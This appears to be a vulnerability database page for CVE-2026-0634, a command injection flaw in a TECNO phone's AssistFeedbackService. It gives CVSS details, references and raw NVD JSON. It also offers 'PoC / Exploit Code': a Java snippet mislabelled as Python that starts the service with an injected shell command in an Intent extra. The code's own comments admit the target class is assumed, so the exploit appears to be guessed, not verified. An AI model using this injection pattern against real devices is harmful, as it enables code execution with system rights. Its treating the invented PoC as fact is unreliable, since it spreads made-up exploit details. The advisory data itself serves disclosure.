CVE-2026-0634

Description

Code execution in AssistFeedbackService of TECNO Pova7 Pro 5G on Android allows local apps to execute arbitrary code as system via command injection.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TECNO Pova 7 Pro 5G

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC Concept for CVE-2026-0634
 * Demonstrates command injection in AssistFeedbackService
 */

import android.content.Intent;
import android.content.Context;
import android.util.Log;

public class CVE_2026_0634_PoC {
    private static final String TAG = "CVE-2026-0634_PoC";
    
    public static void exploit(Context context) {
        try {
            // Target the vulnerable service
            Intent intent = new Intent();
            intent.setClassName("com.android.settings", ".assist.AssistFeedbackService"); // Assumed package/class based on description
            
            // Construct malicious payload using command injection
            // Example: appending a command to touch a file to prove execution
            String maliciousInput = "normal_feedback; touch /data/local/tmp/cve_2026_0634_pwned #";
            
            // Put the payload into the Intent extra
            intent.putExtra("feedback_data", maliciousInput);
            
            // Start the service to trigger the vulnerability
            context.startService(intent);
            
            Log.i(TAG, "Payload sent successfully. Check /data/local/tmp/ for proof.");
        } catch (Exception e) {
            Log.e(TAG, "Exploit execution failed", e);
        }
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0634
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0634
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0634/
[4] VulDB https://vuldb.com/cve/CVE-2026-0634
[5] https://security.tecno.com/SRC/securityUpdates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0634", "sourceIdentifier": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "published": "2026-04-02T09:16:20.397", "lastModified": "2026-04-03T16:10:52.680", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Code execution in AssistFeedbackService of TECNO Pova7 Pro 5G on Android allows local apps to execute arbitrary code as system via command injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://security.tecno.com/SRC/securityUpdates", "source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea"}]}}